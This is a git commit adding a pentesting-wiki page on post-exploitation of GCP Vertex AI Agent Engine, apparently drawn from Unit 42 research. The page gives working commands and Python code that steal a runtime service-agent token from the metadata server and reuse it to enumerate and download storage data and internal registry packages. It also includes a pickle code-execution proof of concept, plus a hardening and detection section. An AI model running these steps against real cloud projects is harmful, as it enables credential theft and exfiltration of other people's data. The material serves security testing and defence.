Commit cccacb7

Merge pull request #271 from HackTricks-wiki/update_Double_Agents__Exposing_Security_Blind_Spots_in_GC_20260331_131528

Double Agents Exposing Security Blind Spots in GCP Vertex AI

2 parents 941e8d6 + 6b2c22a, commit cccacb7

File tree: 5 files changed, +324 −2 lines changed
src/SUMMARY.md

Lines changed: 1 addition & 0 deletions

@@ -104,6 +104,7 @@
 - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
 - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
 - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
+- [GCP - Vertex AI Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
 - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
 - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
 - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md

Lines changed: 297 additions & 0 deletions

@@ -0,0 +1,297 @@

# GCP - Vertex AI Post Exploitation

{{#include ../../../banners/hacktricks-training.md}}

## Vertex AI Agent Engine / Reasoning Engine

This page focuses on **Vertex AI Agent Engine / Reasoning Engine** workloads that run attacker-controlled tools or code inside a Google-managed runtime.
8+
9+
For the general Vertex AI overview check:
10+
11+
{{#ref}}
12+
../gcp-services/gcp-vertex-ai-enum.md
13+
{{#endref}}
14+
15+
For classic Vertex AI privesc paths using custom jobs, models, and endpoints check:
16+
17+
{{#ref}}
18+
../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
19+
{{#endref}}
20+
21+
### Why this service is special
22+
23+
Agent Engine introduces a useful but dangerous pattern: **developer-supplied code running inside a managed Google runtime with a Google-managed identity**.
24+
25+
The interesting trust boundaries are:
26+
27+
- **Consumer project**: your project and your data.
28+
- **Producer project**: Google-managed project operating the backend service.
29+
- **Tenant project**: Google-managed project dedicated to the deployed agent instance.
30+
31+
According to Google's Vertex AI IAM documentation, Vertex AI resources can use **Vertex AI service agents** as resource identities, and those service agents can have **read-only access to all Cloud Storage resources and BigQuery data in the project** by default. If code running inside Agent Engine can steal the runtime credentials, that default access becomes immediately interesting.
### Main abuse path

1. Deploy or modify an agent so that attacker-controlled tool code executes inside the managed runtime.
2. Query the **metadata server** to recover the project identity, service account identity, OAuth scopes, and access tokens.
3. Reuse the stolen token as the **Vertex AI Reasoning Engine P4SA / service agent**.
4. Pivot into the **consumer project** and read the project-wide storage data allowed to the service agent.
5. Pivot into the **producer** and **tenant** environments reachable by the same identity.
6. Enumerate internal Artifact Registry packages and extract tenant deployment artifacts such as `Dockerfile.zip`, `requirements.txt`, and `code.pkl`.

This is not just a "run code in your own agent" issue. The key problem is the combination of:

- **metadata-accessible credentials**
- **broad default service-agent privileges**
- **wide OAuth scopes**
- **multi-project trust boundaries hidden behind one managed service**
## Enumeration

### Identify Agent Engine resources

The resource name format used by Agent Engine is:

```text
projects/<project-id>/locations/<location>/reasoningEngines/<reasoning-engine-id>
```
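If you need to slice these names apart in tooling, a throwaway parser is enough (hypothetical helper, not part of any SDK):

```python
import re

# Matches the documented Reasoning Engine resource-name format.
PATTERN = re.compile(
    r"projects/(?P<project>[^/]+)/locations/(?P<location>[^/]+)"
    r"/reasoningEngines/(?P<engine>[^/]+)$"
)

def parse_engine_name(name: str) -> dict:
    """Split a reasoningEngines resource name into its components."""
    m = PATTERN.match(name)
    if not m:
        raise ValueError(f"not a reasoningEngines resource name: {name}")
    return m.groupdict()

print(parse_engine_name(
    "projects/victim-proj/locations/us-central1/reasoningEngines/12345"
))
# {'project': 'victim-proj', 'location': 'us-central1', 'engine': '12345'}
```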
If you have a token with Vertex AI access, enumerate the Reasoning Engine API directly:

```bash
PROJECT_ID=<project-id>
LOCATION=<location>

curl -s \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${LOCATION}-aiplatform.googleapis.com/v1/projects/${PROJECT_ID}/locations/${LOCATION}/reasoningEngines"
```

Check deployment logs, because they can leak the **internal producer Artifact Registry paths** used during packaging or runtime startup:

```bash
gcloud logging read \
  'textPayload:("pkg.dev" OR "reasoning-engine") OR jsonPayload:("pkg.dev" OR "reasoning-engine")' \
  --project <project-id> \
  --limit 50 \
  --format json
```

The Unit 42 research observed internal paths such as:

```text
us-docker.pkg.dev/cloud-aiplatform-private/reasoning-engine
us-docker.pkg.dev/cloud-aiplatform-private/llm-extension/reasoning-engine-py310:prod
```
## Metadata credential theft from the runtime

If you can execute code inside the agent runtime, first query the metadata service:

```bash
curl -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/?recursive=true'
```

Interesting fields include:

- project identifiers
- the attached service account / service agent
- the OAuth scopes available to the runtime
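A minimal sketch of pulling those fields out of the recursive response. The key names below are assumptions modeled on the Compute-style metadata tree, so verify them against the actual payload you get back:

```python
import json

def summarize_metadata(doc: dict) -> dict:
    """Pull out the fields worth stealing from a recursive metadata document."""
    sa = doc.get("serviceAccounts", {}).get("default", {})
    return {
        "project": doc.get("projectId"),
        "service_account": sa.get("email"),
        "scopes": sa.get("scopes", []),
    }

# Illustrative payload only; a real response contains many more keys.
sample = json.loads("""{
  "projectId": "victim-project",
  "serviceAccounts": {
    "default": {
      "email": "service-123@gcp-sa-aiplatform-re.iam.gserviceaccount.com",
      "scopes": ["https://www.googleapis.com/auth/cloud-platform"]
    }
  }
}""")

print(summarize_metadata(sample))
```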
Then request a token for the attached identity:

```bash
curl -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'
```

Validate the token and inspect the granted scopes:

```bash
TOKEN="$(curl -s -H 'Metadata-Flavor: Google' \
  'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token' | jq -r .access_token)"

curl -s \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -d "access_token=${TOKEN}" \
  https://www.googleapis.com/oauth2/v1/tokeninfo
```

> [!WARNING]
> Google changed parts of the ADK deployment workflow after the research was reported, so exact old deployment snippets might no longer match the current SDK. The important primitive is still the same: **if attacker-controlled code executes inside the Agent Engine runtime, metadata-derived credentials become reachable unless additional controls block that path**.
## Consumer-project pivot: service-agent data theft

Once the runtime token is stolen, test the effective access of the service agent against the consumer project.

The documented risky default capability is broad **read access to project data**. The Unit 42 research specifically validated:

- `storage.buckets.get`
- `storage.buckets.list`
- `storage.objects.get`
- `storage.objects.list`

Practical validation with the stolen token:

```bash
curl -s \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b?project=<project-id>"

curl -s \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b/<bucket-name>/o"

curl -s \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b/<bucket-name>/o/<url-encoded-object>?alt=media"
```

This turns a compromised or malicious agent into a **project-wide storage exfiltration primitive**.
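The three curl calls above can be chained into one loop. A rough sketch of that automation (the helper names are made up; `exfiltrate` performs live API calls, while `gcs_url` is a pure URL builder):

```python
import json
import urllib.parse
import urllib.request

API = "https://storage.googleapis.com/storage/v1"

def gcs_url(path: str, **params: str) -> str:
    """Build a GCS JSON API URL (pure helper, safe to unit-test offline)."""
    qs = urllib.parse.urlencode(params)
    return f"{API}/{path}" + (f"?{qs}" if qs else "")

def gcs_get(token: str, url: str) -> dict:
    """GET a GCS JSON API URL using the stolen bearer token."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def exfiltrate(token: str, project: str) -> dict:
    """Map every readable bucket to the object names inside it."""
    loot = {}
    for bucket in gcs_get(token, gcs_url("b", project=project)).get("items", []):
        name = bucket["name"]
        objs = gcs_get(token, gcs_url(f"b/{name}/o")).get("items", [])
        loot[name] = [o["name"] for o in objs]
        # To download: gcs_url(f"b/{name}/o/" + urllib.parse.quote(obj, safe=""), alt="media")
    return loot
```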
## Producer-project pivot: internal Artifact Registry access

The same stolen identity may also work against **Google-managed producer resources**.

Start by testing the internal repository URIs recovered from logs. Then enumerate packages with the Artifact Registry API:

```python
from googleapiclient.discovery import build  # pip install google-api-python-client

# Client authenticated with the ambient (stolen) credentials
artifactregistry_service = build("artifactregistry", "v1")

packages_request = (
    artifactregistry_service.projects()
    .locations()
    .repositories()
    .packages()
    .list(parent=f"projects/{project_id}/locations/{location_id}/repositories/llm-extension")
)
packages_response = packages_request.execute()
packages = packages_response.get("packages", [])
```

If you only have a raw bearer token, call the REST API directly:

```bash
curl -s \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://artifactregistry.googleapis.com/v1/projects/<producer-project>/locations/<location>/repositories/llm-extension/packages"
```

This is valuable even if write access is blocked, because it exposes:

- internal image names
- deprecated images
- supply-chain structure
- package/version inventory for follow-on research

For more Artifact Registry background check:

{{#ref}}
../gcp-services/gcp-artifact-registry-enum.md
{{#endref}}
## Tenant-project pivot: deployment artifact retrieval

Reasoning Engine deployments also leave interesting artifacts in a **tenant project** controlled by Google for that instance.

The Unit 42 research found:

- `Dockerfile.zip`
- `code.pkl`
- `requirements.txt`

Use the stolen token to enumerate accessible storage and search for deployment artifacts:

```bash
curl -s \
  -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b?project=<tenant-project>"
```

Artifacts from the tenant project can reveal:

- internal bucket names
- internal image references
- packaging assumptions
- dependency lists
- serialized agent code

The blog also observed an internal reference like:

```text
gs://reasoning-engine-restricted/versioned_py/Dockerfile.zip
```

Even when the referenced restricted bucket is not readable, such leaked paths help map internal infrastructure.
## `code.pkl` and conditional RCE

If the deployment pipeline stores executable agent state in **Python `pickle`** format, treat it as a high-risk target.

The immediate issue is **confidentiality**:

- offline deserialization can expose code structure
- the package format leaks implementation details

The bigger issue is **conditional RCE**:

- if an attacker can tamper with the serialized artifact before service-side deserialization
- and the pipeline later loads that pickle
- arbitrary code execution becomes possible inside the managed runtime

This is not a standalone exploit by itself. It is a **dangerous deserialization sink** that becomes critical when combined with any artifact-write or supply-chain tampering primitive.
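To see why a tampered `code.pkl` is an execution primitive rather than just a data leak, recall that unpickling can invoke arbitrary callables via `__reduce__`. A benign proof of concept:

```python
import os
import pickle

class Dropper:
    # pickle calls __reduce__ to learn how to rebuild the object:
    # "rebuilding" here means calling exec() on attacker-chosen source.
    def __reduce__(self):
        return (exec, ("import os; os.environ['PWNED_BY_PICKLE'] = '1'",))

blob = pickle.dumps(Dropper())        # what a tampered code.pkl could contain
pickle.loads(blob)                    # loading == executing the payload
print(os.environ["PWNED_BY_PICKLE"])  # prints: 1
```

This is why serialized agent state should only ever be loaded from trusted, integrity-checked sources.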
## OAuth scopes and Workspace blast radius

The metadata response also exposes the **OAuth scopes** attached to the runtime.

If those scopes are broader than the minimum required, a stolen token may become useful against more than GCP APIs. IAM still decides whether the identity is authorized, but broad scopes increase the blast radius and make later misconfigurations more dangerous.
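A quick way to triage that blast radius offline is to diff the granted scopes (the space-separated `scope` field from the tokeninfo response) against a per-agent minimal baseline. The baseline below is a made-up placeholder you would tune per agent:

```python
# Made-up minimal baseline: what this particular agent actually needs.
MINIMAL_SCOPES = {
    "https://www.googleapis.com/auth/devstorage.read_only",
}

def excess_scopes(scope_field: str) -> list[str]:
    """tokeninfo returns 'scope' as one space-separated string."""
    granted = set(scope_field.split())
    return sorted(granted - MINIMAL_SCOPES)

print(excess_scopes(
    "https://www.googleapis.com/auth/cloud-platform "
    "https://www.googleapis.com/auth/devstorage.read_only"
))
# ['https://www.googleapis.com/auth/cloud-platform']
```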
If you find Workspace-related scopes, cross-check whether the compromised identity also has a path to Workspace impersonation or delegated access:

{{#ref}}
../gcp-to-workspace-pivoting/README.md
{{#endref}}
## Hardening / detection

### Prefer a custom service account over the default managed identity

Current Agent Engine documentation supports setting a **custom service account** for the deployed agent. That is the cleanest way to reduce the blast radius:

- remove dependence on the default broad service agent
- grant only the minimal permissions required by the agent
- make the runtime identity auditable and intentionally scoped
### Validate the actual service-agent access

Inspect the effective access of the Vertex AI service agent in every project where Agent Engine is used:

```bash
gcloud projects get-iam-policy <project-id> \
  --format json | jq '
  .bindings[]
  | select(any(.members[]?; contains("gcp-sa-aiplatform") or contains("aiplatform-re")))
'
```

Focus on whether the attached identity can read:

- all GCS buckets
- BigQuery datasets
- Artifact Registry repositories
- secrets or internal registries reachable from build/deployment workflows
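The same check can be run offline against an exported policy. A Python equivalent of the jq filter above, fed with `gcloud projects get-iam-policy <project-id> --format json` output (the sample policy is illustrative):

```python
import json

def service_agent_bindings(policy: dict) -> list[dict]:
    """Return the IAM bindings that mention a Vertex AI service agent."""
    needles = ("gcp-sa-aiplatform", "aiplatform-re")
    return [
        b for b in policy.get("bindings", [])
        if any(n in m for m in b.get("members", []) for n in needles)
    ]

# Illustrative exported policy, not a real project's.
sample_policy = json.loads("""{
  "bindings": [
    {"role": "roles/aiplatform.serviceAgent",
     "members": ["serviceAccount:service-123@gcp-sa-aiplatform.iam.gserviceaccount.com"]},
    {"role": "roles/viewer",
     "members": ["user:dev@example.com"]}
  ]
}""")

for b in service_agent_bindings(sample_policy):
    print(b["role"])  # prints: roles/aiplatform.serviceAgent
```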
### Treat agent code as privileged code execution

Any tool/function executed by the agent should be reviewed as if it were code running on a VM with metadata access. In practice this means:

- review agent tools for direct HTTP access to metadata endpoints
- review logs for references to internal `pkg.dev` repositories and tenant buckets
- review any packaging path that stores executable state as `pickle`

## References

- [Double Agents: Exposing Security Blind Spots in GCP Vertex AI](https://unit42.paloaltonetworks.com/double-agents-vertex-ai/)
- [Deploy an agent - Vertex AI Agent Engine](https://docs.cloud.google.com/agent-builder/agent-engine/deploy)
- [Vertex AI access control with IAM](https://docs.cloud.google.com/vertex-ai/docs/general/access-control)
- [Service accounts and service agents](https://docs.cloud.google.com/iam/docs/service-account-types#service-agents)
- [Authorization for Google Cloud APIs](https://docs.cloud.google.com/docs/authentication#authorization-gcp)
- [pickle - Python object serialization](https://docs.python.org/3/library/pickle.html)

{{#include ../../../banners/hacktricks-training.md}}

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md

Lines changed: 6 additions & 2 deletions

@@ -39,6 +39,12 @@ gcloud iam roles create <ROLE_ID> \
 An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.

+For a **resource-driven** variant where attacker-controlled code steals a **managed Vertex AI Agent Engine runtime token** from the metadata service and reuses it as the Vertex AI service agent, check:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
+{{#endref}}
+
 ```bash
 gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
   auth print-access-token
 ```

@@ -158,5 +164,3 @@ You can find an example on how to create and OpenID token behalf a service accou
 {{#include ../../../banners/hacktricks-training.md}}
-
-

src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-vertex-ai-privesc.md

Lines changed: 6 additions & 0 deletions

@@ -10,6 +10,12 @@ For more information about Vertex AI check:
 ../gcp-services/gcp-vertex-ai-enum.md
 {{#endref}}

+For **Agent Engine / Reasoning Engine** post-exploitation paths using the runtime metadata service, the default Vertex AI service agent, and cross-project pivoting into consumer / producer / tenant resources, check:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
+{{#endref}}
+
 ### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

 With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` on a target service account, an attacker can **execute arbitrary code with elevated privileges**.

src/pentesting-cloud/gcp-security/gcp-services/gcp-vertex-ai-enum.md

Lines changed: 14 additions & 0 deletions

@@ -12,6 +12,14 @@
 - **Access pre-trained models** from Model Garden
 - **Monitor and optimize** model performance

+### Agent Engine / Reasoning Engine
+
+For **Agent Engine / Reasoning Engine** specific enumeration and post-exploitation paths involving **metadata credential theft**, **P4SA abuse**, and **producer/tenant project pivoting**, check:
+
+{{#ref}}
+../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
+{{#endref}}
+
 ### Key Components

 #### Models

@@ -263,6 +271,12 @@ In the following page, you can check how to **abuse Vertex AI permissions to esc
 ../gcp-privilege-escalation/gcp-vertex-ai-privesc.md
 {{#endref}}

+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md
+{{#endref}}
+
 ## References

 - [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
